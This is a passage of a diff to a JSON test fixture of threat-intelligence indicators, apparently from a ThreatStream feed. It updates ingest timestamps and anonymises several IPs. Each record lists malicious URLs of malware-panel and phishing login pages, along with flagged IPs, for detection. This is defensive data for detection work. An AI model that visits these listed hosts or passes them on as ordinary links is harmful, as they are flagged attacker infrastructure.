'http://kayfundz.ru/kay/eng/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:54.544Z\"}", "category": "threat", "type": "indicator", @@ -15811,7 +15811,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386545556Z", + "ingested": "2021-12-13T08:38:40.024391Z", "original": "{\"created\":\"2020-02-05T01:58:09.73Z\",\"description\":\"TS ID: 55287965572; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--65a8989b-25c3-498e-8247-0514d5aa719e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-05T01:58:09.73Z\",\"name\":\"mal_url: http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:09.73Z\"}", "category": "threat", "type": "indicator", @@ -15830,7 +15830,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.7/hoist3/logs/omc.php", + "name": "mal_url: http://89.160.20.156/hoist3/logs/omc.php", "description": "TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-05T01:58:17.365Z", "valid_from": "2020-02-05T01:58:17.365Z", @@ -15855,16 +15855,16 @@ "url": { "path": "/hoist3/logs/omc.php", "extension": "php", - "original": "http://193.142.59.7/hoist3/logs/omc.php", + "original": "http://89.160.20.156/hoist3/logs/omc.php", "scheme": "http", - "domain": "193.142.59.7", - "full": "http://193.142.59.7/hoist3/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/hoist3/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386549793Z", - "original": "{\"created\":\"2020-02-05T01:58:17.365Z\",\"description\":\"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-05T01:58:17.365Z\",\"name\":\"mal_url: http://193.142.59.7/hoist3/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.7/hoist3/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.365Z\"}", + "ingested": "2021-12-13T08:38:40.024398500Z", + "original": "{\"created\":\"2020-02-05T01:58:17.365Z\",\"description\":\"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-05T01:58:17.365Z\",\"name\":\"mal_url: http://89.160.20.156/hoist3/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/hoist3/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.365Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15882,7 +15882,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 46.29.161.60", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime", "modified": "2020-02-05T01:58:17.428Z", "valid_from": "2020-02-05T01:58:17.428Z", @@ -15904,12 +15904,12 @@ "first_seen": "2020-02-05T01:58:17.428Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "46.29.161.60" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386554212Z", - "original": "{\"created\":\"2020-02-05T01:58:17.428Z\",\"description\":\"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--7aed3145-aab6-470d-bb4f-592d86654719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-02-05T01:58:17.428Z\",\"name\":\"mal_ip: 46.29.161.60\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '46.29.161.60']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.428Z\"}", + "ingested": "2021-12-13T08:38:40.024405700Z", + "original": "{\"created\":\"2020-02-05T01:58:17.428Z\",\"description\":\"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--7aed3145-aab6-470d-bb4f-592d86654719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-02-05T01:58:17.428Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.428Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15960,7 +15960,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386558530Z", + "ingested": "2021-12-13T08:38:40.024411500Z", "original": "{\"created\":\"2020-02-05T01:58:31.683Z\",\"description\":\"TS ID: 55287965571; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--af8e5326-c1d4-4f9e-8f47-ee23c6a2606a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T01:58:31.683Z\",\"name\":\"mal_url: http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.683Z\"}", "category": "threat", "type": "indicator", @@ -15979,7 +15979,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://217.160.59.64/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55287965557; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime", "modified": "2020-02-05T01:58:31.704Z", "valid_from": "2020-02-05T01:58:31.704Z", @@ -16004,16 +16004,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://217.160.59.64/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "217.160.59.64", - "full": "http://217.160.59.64/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386562868Z", - "original": "{\"created\":\"2020-02-05T01:58:31.704Z\",\"description\":\"TS ID: 55287965557; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--59c28566-62b0-4102-ad17-53ec3a143144\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-05T01:58:31.704Z\",\"name\":\"mal_url: http://217.160.59.64/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://217.160.59.64/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.704Z\"}", + "ingested": "2021-12-13T08:38:40.024418600Z", + "original": "{\"created\":\"2020-02-05T01:58:31.704Z\",\"description\":\"TS ID: 55287965557; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--59c28566-62b0-4102-ad17-53ec3a143144\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-05T01:58:31.704Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.704Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16031,7 +16031,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "name": "mal_url: http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", "description": "TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime", "modified": "2020-02-05T01:58:32.111Z", "valid_from": "2020-02-05T01:58:32.111Z", @@ -16056,16 +16056,16 @@ "url": { "path": "/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", "extension": "php", - "original": "http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "original": "http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", "scheme": "http", - "domain": "104.223.170.113", - "full": "http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386567236Z", - "original": "{\"created\":\"2020-02-05T01:58:32.111Z\",\"description\":\"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:32.111Z\",\"name\":\"mal_url: http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.111Z\"}", + "ingested": "2021-12-13T08:38:40.024425500Z", + "original": "{\"created\":\"2020-02-05T01:58:32.111Z\",\"description\":\"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:32.111Z\",\"name\":\"mal_url: http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.111Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16116,7 +16116,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386571594Z", + "ingested": "2021-12-13T08:38:40.024432500Z", "original": "{\"created\":\"2020-02-05T01:58:32.145Z\",\"description\":\"TS ID: 55287965577; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--69661075-e6cb-4054-820c-61954757f0ba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:58:32.145Z\",\"name\":\"mal_url: http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.145Z\"}", "category": "threat", "type": "indicator", @@ -16168,7 +16168,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386575742Z", + "ingested": "2021-12-13T08:38:40.024439500Z", "original": "{\"created\":\"2020-02-05T01:58:34.795Z\",\"description\":\"TS ID: 55287965581; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--5be6be50-c2ef-4502-857e-f69dd17d37a9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-05T01:58:34.795Z\",\"name\":\"mal_url: http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:34.795Z\"}", "category": "threat", "type": "indicator", @@ -16219,7 +16219,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386580461Z", + "ingested": "2021-12-13T08:38:40.024446500Z", "original": "{\"created\":\"2020-02-05T01:58:34.836Z\",\"description\":\"TS ID: 55287965567; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7de3f68d-51ed-43c0-b5d9-c63d621aa99f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-05T01:58:34.836Z\",\"name\":\"mal_url: http://domainmanagerz.net/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://domainmanagerz.net/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:34.836Z\"}", "category": "threat", "type": "indicator", @@ -16271,7 +16271,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386585030Z", + "ingested": "2021-12-13T08:38:40.024453400Z", "original": "{\"created\":\"2020-02-05T01:58:41.381Z\",\"description\":\"TS ID: 55287965564; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime\",\"id\":\"indicator--08ec347d-3d22-45e6-96fc-3fc3bb37c720\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-05T01:58:41.381Z\",\"name\":\"mal_url: http://groupbizconsulting.com/p3/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groupbizconsulting.com/p3/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:41.381Z\"}", "category": "threat", "type": "indicator", @@ -16323,7 +16323,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386589548Z", + "ingested": "2021-12-13T08:38:40.024460500Z", "original": "{\"created\":\"2020-02-05T01:58:59.279Z\",\"description\":\"TS ID: 55287965569; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--b845a78e-d141-455e-92ff-df401787a3cd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:59.279Z\",\"name\":\"mal_url: http://samundarmarine.com/denty/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samundarmarine.com/denty/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:59.279Z\"}", "category": "threat", "type": "indicator", @@ -16375,7 +16375,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386594057Z", + "ingested": "2021-12-13T08:38:40.024467500Z", "original": "{\"created\":\"2020-02-05T01:59:03.426Z\",\"description\":\"TS ID: 55287965563; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime\",\"id\":\"indicator--e9d4f82a-bc23-4f9a-81e0-05097acc6daa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-05T01:59:03.426Z\",\"name\":\"mal_url: http://groupbizconsulting.com/p4/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groupbizconsulting.com/p4/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:03.426Z\"}", "category": "threat", "type": "indicator", @@ -16394,7 +16394,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 138.201.56.185", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime", "modified": "2020-02-05T01:59:04.695Z", "valid_from": "2020-02-05T01:59:04.695Z", @@ -16416,12 +16416,12 @@ "first_seen": "2020-02-05T01:59:04.695Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "138.201.56.185" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386598455Z", - "original": "{\"created\":\"2020-02-05T01:59:04.695Z\",\"description\":\"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--57e76166-d475-4027-b2d9-b4910c5b0747\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-05T01:59:04.695Z\",\"name\":\"mal_ip: 138.201.56.185\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '138.201.56.185']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:04.695Z\"}", + "ingested": "2021-12-13T08:38:40.024476500Z", + "original": "{\"created\":\"2020-02-05T01:59:04.695Z\",\"description\":\"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--57e76166-d475-4027-b2d9-b4910c5b0747\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-05T01:59:04.695Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:04.695Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16472,7 +16472,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386602783Z", + "ingested": "2021-12-13T08:38:40.024483300Z", "original": "{\"created\":\"2020-02-05T01:59:06.271Z\",\"description\":\"TS ID: 55287965580; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--63fdc395-3d7f-4435-a7ea-2c26783ea7b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-05T01:59:06.271Z\",\"name\":\"mal_url: http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:06.271Z\"}", "category": "threat", "type": "indicator", @@ -16524,7 +16524,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386606971Z", + "ingested": "2021-12-13T08:38:40.024486700Z", "original": "{\"created\":\"2020-02-05T01:59:24.611Z\",\"description\":\"TS ID: 55287965562; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--9ed89f91-5df1-4cad-b6e7-9d275759d32e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-05T01:59:24.611Z\",\"name\":\"mal_url: http://ipblasta.com/kmaker/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ipblasta.com/kmaker/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:24.611Z\"}", "category": "threat", "type": "indicator", @@ -16576,7 +16576,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386611189Z", + "ingested": "2021-12-13T08:38:40.024491700Z", "original": "{\"created\":\"2020-02-05T01:59:31.341Z\",\"description\":\"TS ID: 55287965559; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime\",\"id\":\"indicator--421221e0-b0c7-4bbe-a12c-412f689f4769\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-05T01:59:31.341Z\",\"name\":\"mal_url: http://softtouchcollars.com/origin/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://softtouchcollars.com/origin/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:31.341Z\"}", "category": "threat", "type": "indicator", @@ -16595,7 +16595,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.241.216.92", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-02-05T01:59:47.461Z", "valid_from": "2020-02-05T01:59:47.461Z", @@ -16617,12 +16617,12 @@ "first_seen": "2020-02-05T01:59:47.461Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.241.216.92" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386615497Z", - "original": "{\"created\":\"2020-02-05T01:59:47.461Z\",\"description\":\"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-05T01:59:47.461Z\",\"name\":\"mal_ip: 162.241.216.92\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.241.216.92']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.461Z\"}", + "ingested": "2021-12-13T08:38:40.024497400Z", + "original": "{\"created\":\"2020-02-05T01:59:47.461Z\",\"description\":\"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-05T01:59:47.461Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.461Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16640,7 +16640,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 89.208.84.96", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime", "modified": "2020-02-05T01:59:47.506Z", "valid_from": "2020-02-05T01:59:47.506Z", @@ -16662,12 +16662,12 @@ "first_seen": "2020-02-05T01:59:47.506Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "89.208.84.96" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386619835Z", - "original": "{\"created\":\"2020-02-05T01:59:47.506Z\",\"description\":\"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:59:47.506Z\",\"name\":\"mal_ip: 89.208.84.96\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.208.84.96']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.506Z\"}", + "ingested": "2021-12-13T08:38:40.024503600Z", + "original": "{\"created\":\"2020-02-05T01:59:47.506Z\",\"description\":\"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:59:47.506Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.506Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16718,7 +16718,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386624153Z", + "ingested": "2021-12-13T08:38:40.024507400Z", "original": "{\"created\":\"2020-02-05T02:00:16.19Z\",\"description\":\"TS ID: 55287965578; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--1a4e59e6-28dd-4087-9a19-b5d274d484d5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-05T02:00:16.19Z\",\"name\":\"mal_url: http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:16.19Z\"}", "category": "threat", "type": "indicator", @@ -16770,7 +16770,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386628581Z", + "ingested": "2021-12-13T08:38:40.024512600Z", "original": "{\"created\":\"2020-02-05T02:00:23.009Z\",\"description\":\"TS ID: 55287965575; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--aef5784f-1ba2-4f45-9345-9b96bffe3cfd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-05T02:00:23.009Z\",\"name\":\"mal_url: http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:23.009Z\"}", "category": "threat", "type": "indicator", @@ -16822,7 +16822,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386633100Z", + "ingested": "2021-12-13T08:38:40.024535600Z", "original": "{\"created\":\"2020-02-05T02:00:29.679Z\",\"description\":\"TS ID: 55287965579; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--5fbeda08-8cf4-459a-873c-28cef82221b5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-05T02:00:29.679Z\",\"name\":\"mal_url: http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:29.679Z\"}", "category": "threat", "type": "indicator", @@ -16874,7 +16874,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386637398Z", + "ingested": "2021-12-13T08:38:40.024540Z", "original": "{\"created\":\"2020-02-05T02:00:52.297Z\",\"description\":\"TS ID: 55287965570; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: 